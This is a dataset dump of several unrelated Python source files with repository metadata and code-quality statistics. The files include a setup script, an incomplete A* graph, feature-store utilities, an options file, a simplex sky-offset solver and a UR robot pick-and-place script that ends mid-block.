hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a113c8e85fbfe0a4e5ea8110782dae46220ba93c | 262 | py | Python | setup.py | geickelb/hsip441_neiss_python | 0ad88a664b369ea058b28d79ed98d02ff8418aad | [
"MIT"
] | null | null | null | setup.py | geickelb/hsip441_neiss_python | 0ad88a664b369ea058b28d79ed98d02ff8418aad | [
"MIT"
] | null | null | null | setup.py | geickelb/hsip441_neiss_python | 0ad88a664b369ea058b28d79ed98d02ff8418aad | [
"MIT"
] | null | null | null | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.0.1',
description='compiling code for HSIP441 using python to explore the Neiss database',
author='Garrett Eickelberg',
license='MIT',
)
| 23.818182 | 88 | 0.70229 | 33 | 262 | 5.515152 | 0.848485 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 0.187023 | 262 | 10 | 89 | 26.2 | 0.826291 | 0 | 0 | 0 | 0 | 0 | 0.374046 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a11510f716edaa915f408fd4bc5559303960aa62 | 1,770 | py | Python | Computer & Information Science Core courses/2168/A*/graph.py | Vaporjawn/Temple-University-Computer-Science-Resources | 8d54db3a85a1baa8ba344efc90593b440eb6d585 | [
"MIT"
] | 1 | 2020-07-28T16:18:38.000Z | 2020-07-28T16:18:38.000Z | Computer & Information Science Core courses/2168/A*/graph.py | Vaporjawn/Temple-University-Computer-Science-Resources | 8d54db3a85a1baa8ba344efc90593b440eb6d585 | [
"MIT"
] | 4 | 2020-07-15T06:40:55.000Z | 2020-08-13T16:01:30.000Z | Computer & Information Science Core courses/2168/A*/graph.py | Vaporjawn/Temple-University-Computer-Science-Resources | 8d54db3a85a1baa8ba344efc90593b440eb6d585 | [
"MIT"
] | null | null | null | """Implement the graph to traverse."""
from collections import Counter
class Node:
"""Node class."""
def __init__(self, value, x, y):
"""Initialize node."""
self.x = x
self.y = y
self.value = value
self.neighbors = []
def add_neighbor(self, n, weight):
"""Add a neighbor to this node."""
self.neighbors.append((n, weight))
class Graph:
"""Graph of nodes."""
def __init__(self):
"""Initialize."""
self.nodes = []
def add_node(self, value, x, y):
"""Add a new node to the graph."""
new_node = Node(value, x, y)
self.nodes.append(new_node)
return new_node
def add_edge(self, node1, node2, weight=1):
"""Connect two nodes with optional edge weight specification."""
node1.add_neighbor(node2, weight)
node2.add_neighbor(node1, weight)
def find_path(self, start, end):
"""Use A* to find a path from start to end in the graph."""
visited_nodes = {}
accessible_nodes = {}
current_distance = 0
current = start
# Loop as long as the end node has not been found
# this is not finished yet!!!
while(current.value != end.value):
# calculate cost for each neighbor of n
costs = []
for n in current.neighbors:
cost = self.g(n, current_distance) + self.h(n, end)
costs.append((n, g))
def g(self, n, current_distance):
"""Calculate the distance from the start node."""
return current_distance + n[1]
def h(self, n, end):
"""Estimate the distance to the end node using Manhattan distance."""
return abs(n[0].x - end.x) + abs(n[0].y - end.y)
| 28.095238 | 77 | 0.564972 | 236 | 1,770 | 4.139831 | 0.305085 | 0.028659 | 0.021494 | 0.022518 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009016 | 0.310734 | 1,770 | 62 | 78 | 28.548387 | 0.791803 | 0.272881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.242424 | false | 0 | 0.030303 | 0 | 0.424242 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a116cfc21ab7921ef0308c2ab54fca839bd22800 | 2,027 | py | Python | python/hsfs/util.py | berthoug/feature-store-api | 85c23ae08c7de65acd79a3b528fa72c07e52a272 | [
"Apache-2.0"
] | null | null | null | python/hsfs/util.py | berthoug/feature-store-api | 85c23ae08c7de65acd79a3b528fa72c07e52a272 | [
"Apache-2.0"
] | null | null | null | python/hsfs/util.py | berthoug/feature-store-api | 85c23ae08c7de65acd79a3b528fa72c07e52a272 | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2020 Logical Clocks AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
from pathlib import Path
from hsfs import feature
class FeatureStoreEncoder(json.JSONEncoder):
def default(self, o):
try:
return o.to_dict()
except AttributeError:
return super().default(o)
def validate_feature(ft):
if isinstance(ft, feature.Feature):
return ft
elif isinstance(ft, str):
return feature.Feature(ft)
def parse_features(feature_names):
if isinstance(feature_names, (str, feature.Feature)):
return [validate_feature(feature_names)]
elif isinstance(feature_names, list) and len(feature_names) > 0:
return [validate_feature(feat) for feat in feature_names]
else:
return []
def get_cert_pw():
"""
Get keystore password from local container
Returns:
Certificate password
"""
hadoop_user_name = "hadoop_user_name"
crypto_material_password = "material_passwd"
material_directory = "MATERIAL_DIRECTORY"
password_suffix = "__cert.key"
pwd_path = Path(crypto_material_password)
if not pwd_path.exists():
username = os.environ[hadoop_user_name]
material_directory = Path(os.environ[material_directory])
pwd_path = material_directory.joinpath(username + password_suffix)
with pwd_path.open() as f:
return f.read()
class VersionWarning(Warning):
pass
class StorageWarning(Warning):
pass
| 27.026667 | 76 | 0.700543 | 260 | 2,027 | 5.319231 | 0.488462 | 0.043384 | 0.030369 | 0.023138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0057 | 0.221016 | 2,027 | 74 | 77 | 27.391892 | 0.870171 | 0.322151 | 0 | 0.052632 | 0 | 0 | 0.044162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0.157895 | 0.105263 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a118ceb32497416f45bc3e52e40410e78c21e051 | 836 | py | Python | python_modules/dagster/dagster/core/types/builtin_enum.py | jake-billings/dagster | 7a1548a1f246c48189f3d8109e831b744bceb7d4 | [
"Apache-2.0"
] | 1 | 2019-07-15T17:34:04.000Z | 2019-07-15T17:34:04.000Z | python_modules/dagster/dagster/core/types/builtin_enum.py | jake-billings/dagster | 7a1548a1f246c48189f3d8109e831b744bceb7d4 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster/core/types/builtin_enum.py | jake-billings/dagster | 7a1548a1f246c48189f3d8109e831b744bceb7d4 | [
"Apache-2.0"
] | null | null | null | import sys
if sys.version_info.major >= 3:
import typing
class BuiltinEnum:
ANY = typing.Any
BOOL = typing.NewType('Bool', bool)
FLOAT = typing.NewType('Float', float)
INT = typing.NewType('Int', int)
PATH = typing.NewType('Path', str)
STRING = typing.NewType('String', str)
NOTHING = typing.NewType('Nothing', None)
@classmethod
def contains(cls, value):
return any(value == getattr(cls, key) for key in dir(cls))
else:
from enum import Enum
class BuiltinEnum(Enum):
ANY = 'Any'
BOOL = 'Bool'
FLOAT = 'Float'
INT = 'Int'
PATH = 'Path'
STRING = 'String'
NOTHING = 'Nothing'
@classmethod
def contains(cls, value):
return isinstance(value, cls)
| 22.594595 | 70 | 0.551435 | 92 | 836 | 5 | 0.380435 | 0.169565 | 0.056522 | 0.108696 | 0.156522 | 0.156522 | 0 | 0 | 0 | 0 | 0 | 0.001792 | 0.332536 | 836 | 36 | 71 | 23.222222 | 0.822581 | 0 | 0 | 0.148148 | 0 | 0 | 0.072967 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.111111 | 0.074074 | 0.851852 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a11ebc5157787a925779b80587bf0be3060a8389 | 705 | py | Python | sets-add.py | limeonion/Python-Programming | 90cbbbd7651fc04669e21be2adec02ba655868cf | [
"MIT"
] | null | null | null | sets-add.py | limeonion/Python-Programming | 90cbbbd7651fc04669e21be2adec02ba655868cf | [
"MIT"
] | null | null | null | sets-add.py | limeonion/Python-Programming | 90cbbbd7651fc04669e21be2adec02ba655868cf | [
"MIT"
] | null | null | null | '''
f we want to add a single element to an existing set, we can use the .add() operation.
It adds the element to the set and returns 'None'.
Example
>>> s = set('HackerRank')
>>> s.add('H')
>>> print s
set(['a', 'c', 'e', 'H', 'k', 'n', 'r', 'R'])
>>> print s.add('HackerRank')
None
>>> print s
set(['a', 'c', 'e', 'HackerRank', 'H', 'k', 'n', 'r', 'R'])
The first line contains an integer N, the total number of country stamps.
The next N lines contains the name of the country where the stamp is from.
Output Format
Output the total number of distinct country stamps on a single line.
'''
n = int(input())
countries = set()
for i in range(n):
countries.add(input())
print(len(countries))
| 22.741935 | 87 | 0.635461 | 121 | 705 | 3.702479 | 0.479339 | 0.026786 | 0.040179 | 0.044643 | 0.075893 | 0.053571 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187234 | 705 | 30 | 88 | 23.5 | 0.78185 | 0.838298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a121e58fcc354bb0486144293e6dc4511324fbba | 1,046 | py | Python | option.py | lotress/new-DL | adc9f6f94538088d3d70327d9c7bb089ef7e1638 | [
"MIT"
] | null | null | null | option.py | lotress/new-DL | adc9f6f94538088d3d70327d9c7bb089ef7e1638 | [
"MIT"
] | null | null | null | option.py | lotress/new-DL | adc9f6f94538088d3d70327d9c7bb089ef7e1638 | [
"MIT"
] | null | null | null | from common import *
from model import vocab
option = dict(edim=256, epochs=1.5, maxgrad=1., learningrate=1e-3, sdt_decay_step=1, batchsize=8, vocabsize=vocab, fp16=2, saveInterval=10, logInterval=.4)
option['loss'] = lambda opt, model, y, out, *_, rewards=[]: F.cross_entropy(out.transpose(-1, -2), y, reduction='none')
option['criterion'] = lambda y, out, mask, *_: (out[:,:,1:vocab].max(-1)[1] + 1).ne(y).float() * mask.float()
option['startEnv'] = lambda x, y, l, *args: (x, y, l, *args)
option['stepEnv'] = lambda i, pred, l, *args: (False, 1., None, None) # done episode, fake reward, Null next input, Null length, Null args
option['cumOut'] = False # True to keep trajectory
option['devices'] = [0] if torch.cuda.is_available() else [] # list of GPUs
option['init_method'] = 'file:///tmp/sharedfile' # initial configuration for multiple-GPU training
try:
from qhoptim.pyt import QHAdam
option['newOptimizer'] = lambda opt, params, _: QHAdam(params, lr=opt.learningrate, nus=(.7, .8), betas=(0.995, 0.999))
except ImportError: pass
| 69.733333 | 155 | 0.686424 | 160 | 1,046 | 4.4375 | 0.64375 | 0.021127 | 0.008451 | 0.019718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037322 | 0.129063 | 1,046 | 14 | 156 | 74.714286 | 0.742042 | 0.144359 | 0 | 0 | 0 | 0 | 0.101124 | 0.024719 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.071429 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a12aedcd932c89aac78464696ed1d71cb2034b31 | 9,969 | py | Python | skyoffset/multisimplex.py | jonathansick/skyoffset | 369f54d8a237f48cd56f550e80bf1d39b355bfcd | [
"BSD-3-Clause"
] | null | null | null | skyoffset/multisimplex.py | jonathansick/skyoffset | 369f54d8a237f48cd56f550e80bf1d39b355bfcd | [
"BSD-3-Clause"
] | null | null | null | skyoffset/multisimplex.py | jonathansick/skyoffset | 369f54d8a237f48cd56f550e80bf1d39b355bfcd | [
"BSD-3-Clause"
] | null | null | null | import os
import logging
import platform
import time
import multiprocessing
import numpy
import pymongo
# Pure python/numpy
import simplex
from scalarobj import ScalarObjective
# Cython/numpy
import cyscalarobj
import cysimplex
class MultiStartSimplex(object):
"""Baseclass for multi-start recongerging simplex solvers."""
def __init__(self, dbname, cname, url, port):
#super(MultiStartSimplex, self).__init__()
self.dbname, cname, url, port = dbname, cname, url, port
self.dbname = dbname
self.cname = cname
self.url = url
self.port = port
connection = pymongo.Connection(self.url, self.port)
self.db = connection[self.dbname]
self.collection = self.db[self.cname]
def resetdb(self):
"""Delete existing entries in the mongodb collection for this
multi simplex optimization."""
# Drop the collection, then recreate it
self.db.drop_collection(self.cname)
self.collection = self.db[self.cname]
def _prep_log_file(self):
self.startTime = time.clock() # for timing with close_log_file()
logDir = os.path.dirname(self.logPath)
if os.path.exists(logDir) is False: os.makedirs(logDir)
logging.basicConfig(filename=self.logPath, level=logging.INFO)
logging.info("STARTING NEW SIMPLEX OPTIMIZATION ====================")
hostname = platform.node()
now = time.localtime(time.time())
timeStamp = time.strftime("%y/%m/%d %H:%M:%S %Z", now)
logging.info("MultiStartSimplex started on %s at %s"
% (hostname, timeStamp))
def _close_log_file(self):
endTime = time.clock()
duration = (endTime - self.startTime) / 3600.
logging.info("ENDING SIMPLEX OPTIMIZATION. Duration: %.2f hours"
% duration)
class SimplexScalarOffsetSolver(MultiStartSimplex):
"""Uses a Multi-Start and Reconverging algorithm for converging on the
the set of scalar sky offsets that minimize coupled image differences.
The optimization is persisted in real-time to MongoDB. This means
that multiple computers could be running threads and adding results
to the same pool. While optimization is running, it is possible to
query for the best-to-date offset solution.
"""
def __init__(self, dbname="m31", cname="simplexscalar",
url="localhost", port=27017):
super(SimplexScalarOffsetSolver, self).__init__(dbname,
cname, url, port)
def multi_start(self, couplings, nTrials, logPath, initSigma=6e-10,
restartSigma=1e-11, mp=True, cython=True, log_xtol=-6.,
log_ftol=-5.):
"""Start processing using the Multi-Start Reconverging algorithm.
Parameters
----------
nTrials : int
Number of times a simplex is started.
initSigma : float
Dispersion of offsets
restartSigma : float
Dispersion of offsets about a converged point when making a
restart simplex.
mp : bool
If True, run simplexes in parallel with `multiprocessing`.
cython : bool
True to use the cython version of simplex.
"""
self.logPath = logPath
self._prep_log_file()
self.couplings = couplings
if cython:
self.objf = cyscalarobj.ScalarObjective(self.couplings)
else:
self.objf = ScalarObjective(self.couplings)
ndim = self.objf.get_ndim()
xtol = 10. ** log_xtol # frac error in offsets acceptable for conv
ftol = 10. ** log_ftol # frac error in objective function acceptable
maxiter = 100000 * ndim
maxEvals = 100000 * ndim
simplexArgs = {'xtol': xtol, 'ftol': ftol, 'maxiter': maxiter,
'maxfun': maxEvals, 'full_output': True, 'disp': True,
'retall': False, 'callback': None}
dbArgs = {'dbname': self.dbname, 'cname': self.cname, 'url': self.url,
'port': self.port}
# Create initial simplexes
argsQueue = []
for n in xrange(nTrials):
sim = numpy.zeros([ndim + 1, ndim], dtype=numpy.float64)
for i in xrange(ndim + 1):
sim[i, :] = initSigma * numpy.random.standard_normal(ndim)
args = [sim, cython, self.couplings, simplexArgs, restartSigma,
xtol, n, nTrials, self.logPath, dbArgs]
argsQueue.append(args)
# Run the queue
pool = None
if mp:
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count(),
maxtasksperchild=None)
pool.map(_simplexWorker, argsQueue)
pool.close()
pool.join()
pool.terminate()
else:
map(_simplexWorker, argsQueue)
self._close_log_file()
def find_best_offsets(self):
"""Queries the mongodb collection of simplex runs to find the
optimal result. Returns a dictionary of scalar offsets, keyed
by the field name.
"""
bestEnergy = 1e99 # running tally of best optimization result
bestOffsets = {}
recs = self.collection.find({}, ['best_fopt', 'best_offsets'])
for rec in recs:
if rec['best_fopt'] < bestEnergy:
bestEnergy = rec['best_fopt']
bestOffsets = rec['best_offsets']
# Normalize these offsets so that the net offset is zero
netOffset = 0.
fieldCount = 0
for field, offset in bestOffsets.iteritems():
netOffset += offset
fieldCount += 1
print "Net offset %.2e" % netOffset
netOffset = netOffset / fieldCount
for field, offset in bestOffsets.iteritems():
bestOffsets[field] = offset - netOffset
return bestOffsets
def init_func():
print multiprocessing.current_process().name
def _simplexWorker(argsList):
"""multiprocessing worker function for doing multi-trial simplex solving.
This essentially replaces the multi_start_simplex function in simplex.py
But this exists because it implicitly specifies the target function for the
optimization; multiprocessing can't pickle a function object.
This simplex worker has the ability to restart at the site of convergence
by constructing a simplex that is randomly distributed about the best vertex.
The simplex keeps reconverging from perturbed simplex until the reconverged
minimum matches the previous minimum. That is, I believe I have a global
minimum if the simplex returns to where it started.
"""
startTime = time.clock()
sim, useCython, couplings, kwargs, restartSigma, xTol, n, nTrials, logFilePath, dbArgs = argsList
if useCython:
objf = cyscalarobj.ScalarObjective(couplings)
else:
objf = ScalarObjective(couplings)
# Choose the simplex code
if useCython:
nm_simplex = cysimplex.nm_simplex
else:
nm_simplex = simplex.nm_simplex
#print "Running simplex %i/%i"% (n,nTrials)
Ndim = sim.shape[1]
_evalObjFunc = lambda offsets, objF: objF.compute(offsets)
# These variables keep track of how the code performs
totalFCalls = 0
nRestarts = 0
# Initial simplex compute
_xOpt, _fOpt, _nIters, _nFcalls, _warnflag = nm_simplex(objf,
sim, **kwargs)
bestFOpt = _fOpt
bestXOpt = _xOpt.copy()
totalFCalls += _nFcalls
# These arrays list the running tally of restarts vs best fopt vs total f calls
restartTally = [nRestarts]
bestFOptTally = [bestFOpt]
totalFCallTally = [totalFCalls]
# initiate restarts
while True:
nRestarts += 1
sim = numpy.zeros([Ndim+1, Ndim], dtype=numpy.float64)
sim[0,:] = bestXOpt.copy() # first vertex is the best point
for i in xrange(1,Ndim+1): # rest are randomly distributed.
sim[i,:] = restartSigma*numpy.random.standard_normal(Ndim) + bestXOpt
_xOpt, _fOpt, _nIters, _nFcalls, _warnflag = nm_simplex(objf,
sim, **kwargs)
totalFCalls += _nFcalls
# Ensure that the point has converged
convergenceFrac = (_xOpt - bestXOpt) / bestXOpt
if len(numpy.where(convergenceFrac > xTol)[0]) > 0:
# do another restart of the simplex
if _fOpt < bestFOpt:
# but we did find a new minimum
bestFOpt = _fOpt
bestXOpt = _xOpt.copy()
restartTally.append(nRestarts)
bestFOptTally.append(bestFOpt)
totalFCallTally.append(totalFCalls)
else:
# we're converged
break
# Report this in the log
runtime = time.clock() - startTime
if logFilePath is not None:
logging.basicConfig(filename=logFilePath,level=logging.INFO)
logging.info("%i/%i converged to %.4e in %.2f minutes, %i local restarts" % (n, nTrials, bestFOpt, runtime/60., nRestarts))
# Dictionary stores the history of restarts, as well as teh best solution
# as a field offset dictionary (we're breaking reusability here... just
# to make things faster.)
convergenceHistory = {"total_calls": totalFCalls, "n_restarts": nRestarts,
"runtime": runtime,
"best_offsets": objf.get_best_offsets(),
"best_fopt": bestFOpt,
"restart_hist": restartTally,
"fopt_hist": bestFOptTally,
"fcall_hist": totalFCallTally}
# Connect to MongoDB and add our convergence history!
try:
connection = pymongo.Connection(dbArgs['url'], dbArgs['port'])
db = connection[dbArgs['dbname']]
collection = db[dbArgs['cname']]
collection.insert(convergenceHistory, safe=True)
except pymongo.errors.AutoReconnect:
logging.info("pymongo.errors.AutoReconnect on %i"%n)
# collection.database.connection.disconnect()
| 39.403162 | 131 | 0.634467 | 1,128 | 9,969 | 5.528369 | 0.323582 | 0.012348 | 0.00898 | 0.011546 | 0.085953 | 0.059012 | 0.039128 | 0.028865 | 0.028865 | 0.016357 | 0 | 0.008721 | 0.275354 | 9,969 | 252 | 132 | 39.559524 | 0.854513 | 0.106831 | 0 | 0.128049 | 0 | 0 | 0.0738 | 0.00406 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.067073 | null | null | 0.012195 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a130d81a095f620365d47a00f587d3671ea0c357 | 2,416 | py | Python | libraries/urx_python/urx_scripts/demo_apple_tree.py | giacomotomasi/tennisball_demo | f71cd552e64fe21533abe47b986db6999947c3a9 | [
"Apache-2.0"
] | null | null | null | libraries/urx_python/urx_scripts/demo_apple_tree.py | giacomotomasi/tennisball_demo | f71cd552e64fe21533abe47b986db6999947c3a9 | [
"Apache-2.0"
] | null | null | null | libraries/urx_python/urx_scripts/demo_apple_tree.py | giacomotomasi/tennisball_demo | f71cd552e64fe21533abe47b986db6999947c3a9 | [
"Apache-2.0"
] | null | null | null |
import urx
import logging
import time
if __name__ == "__main__":
logging.basicConfig(level=logging.WARN)
#gripper_remove_pos = [0.0755, -0.2824, 0.3477, -0.0387, -3.0754, 0.4400] # rest position (good to place/remove gripper)
rob = urx.Robot("192.168.56.1")
#rob.set_tcp((0,0,0,0,0,0))
#rob.set_payload(0.5, (0,0,0))
home_pos = [-0.0153, -0.4213, 0.3469, 1.2430, 2.6540, -0.9590]
appro1 = [-0.0762, -0.5575, 0.3546, 0.6110, 2.7090, -1.7840]
apple1 = [-0.1042, -0.6244, 0.3209, 1.4510, 1.9160, -1.4980]
get_far1 = [-0.0510, -0.5086, 0.3215, 0.4900, 2.6510, -1.8690]
appro2 = [-0.1767, -0.4281, 0.3204, 1.8210, 2.0030, -1.5280]
apple2 = [-0.2129, -0.4926, 0.2951, 1.8210, 2.0030, -1.5280]
get_far2 = [-0.1324, -0.3790, 0.3112, 1.8210, 2.0030, -1.5280]
appro_place = [0.3571, -0.3540, 0.3563, 1.2360, 2.8850, -0.0780]
place_pos = [0.3571, -0.3540, 0.2983, 1.2360, 2.8850, -0.0780]
try:
v = 0.2
a = 0.3
rob.set_digital_out(0,0) # initialize gripper
# open gripper
rob.set_digital_out(0, 1)
time.sleep(0.5)
rob.set_digital_out(0,0)
pose = rob.getl() #gives a lists with 6 elements (x, y, z, rx, ry, rz) --> rotation vector
#print("robot tcp is at: ", pose)
# move to home position
#rob.movej(joint_pose, acc=a, vel=v) # it takes as inputs the joints goal values!
rob.movej_to_pose(home_pos, acc=a, vel=0.3)
time.sleep(0.01)
# move towards the first apple to pick (approach it, move to a suitable grabbing position, get away)
rob.movej_to_pose(appro1, acc=a, vel=v)
time.sleep(0.01)
rob.movel(apple1, acc=a, vel=v)
# close gripper
rob.set_digital_out(0, 1)
time.sleep(0.5)
rob.set_digital_out(0,0)
time.sleep(1)
rob.movel(get_far1, a, v)
#move towards the place position
rob.movej_to_pose(appro_place, a, vel=0.3)
time.sleep(0.01)
rob.movel(place_pos, a, v)
# open gripper
rob.set_digital_out(0, 1)
time.sleep(0.5)
rob.set_digital_out(0,0)
time.sleep(1)
rob.movel(appro_place, a, v)
# move to home position
rob.movej_to_pose(home_pos, a, v)
pose_final = rob.getl()
print("robot tcp is at (final): ", pose_final)
finally:
